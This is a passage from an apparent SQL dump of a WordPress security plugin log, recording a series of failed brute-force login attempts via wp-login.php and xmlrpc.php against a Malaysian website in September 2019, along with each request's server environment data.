empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"45473\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9OiOBXE2JRepjOtvmy3QAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624264.5243\";s:12:\"REQUEST_TIME\";s:10:\"1568624264\";}}','notice','2019-09-16 08:57:45','2019-09-16 08:57:44',18256200,19556344,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.201.88'),(24034,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"53340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9OvuBXE2JRepjOtvmy4QAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624318.5162\";s:12:\"REQUEST_TIME\";s:10:\"1568624318\";}}','notice','2019-09-16 08:58:39','2019-09-16 08:58:38',17741280,19233096,'https://bintara.com.my/wp-login.php',1,0,'100.26.104.241'),(24035,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"53798\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9OwQavjo3v4tJT4rvozwAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624321.4112\";s:12:\"REQUEST_TIME\";s:10:\"1568624321\";}}','notice','2019-09-16 08:58:42','2019-09-16 08:58:41',18255008,19553856,'https://bintara.com.my/xmlrpc.php',1,0,'100.26.104.241'),(24036,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"38902\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9RLgavjo3v4tJT4rvqVAAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624942.8183\";s:12:\"REQUEST_TIME\";s:10:\"1568624942\";}}','notice','2019-09-16 09:09:04','2019-09-16 09:09:03',17739544,19231624,'https://bintara.com.my/wp-login.php',1,0,'212.227.20.208'),(24037,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"39372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9RMQavjo3v4tJT4rvqVgAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624946.0415\";s:12:\"REQUEST_TIME\";s:10:\"1568624946\";}}','notice','2019-09-16 09:09:07','2019-09-16 09:09:06',18256200,19556344,'https://bintara.com.my/xmlrpc.php',1,0,'212.227.20.208'),(24038,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"37460\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9UNAavjo3v4tJT4rvsZgAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568625716.1031\";s:12:\"REQUEST_TIME\";s:10:\"1568625716\";}}','notice','2019-09-16 09:21:57','2019-09-16 09:21:56',17739056,19230376,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(24039,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"37896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9UNgavjo3v4tJT4rvsaAAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568625718.7913\";s:12:\"REQUEST_TIME\";s:10:\"1568625718\";}}','notice','2019-09-16 09:22:00','2019-09-16 09:21:59',18256024,19556264,'https://bintara.com.my/xmlrpc.php',1,0,'217.11.48.148'),(24040,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"23431\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Wqwavjo3v4tJT4rvtxAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626348.6883\";s:12:\"REQUEST_TIME\";s:10:\"1568626348\";}}','notice','2019-09-16 09:32:30','2019-09-16 09:32:29',17743312,19230592,'https://bintara.com.my/wp-login.php',1,0,'185.52.2.165'),(24041,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"23431\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Wqwavjo3v4tJT4rvtxAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626348.6883\";s:12:\"REQUEST_TIME\";s:10:\"1568626348\";}}','notice','2019-09-16 09:32:30','2019-09-16 09:32:29',17904992,19230592,'https://bintara.com.my/wp-login.php',1,0,'185.52.2.165'),(24042,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 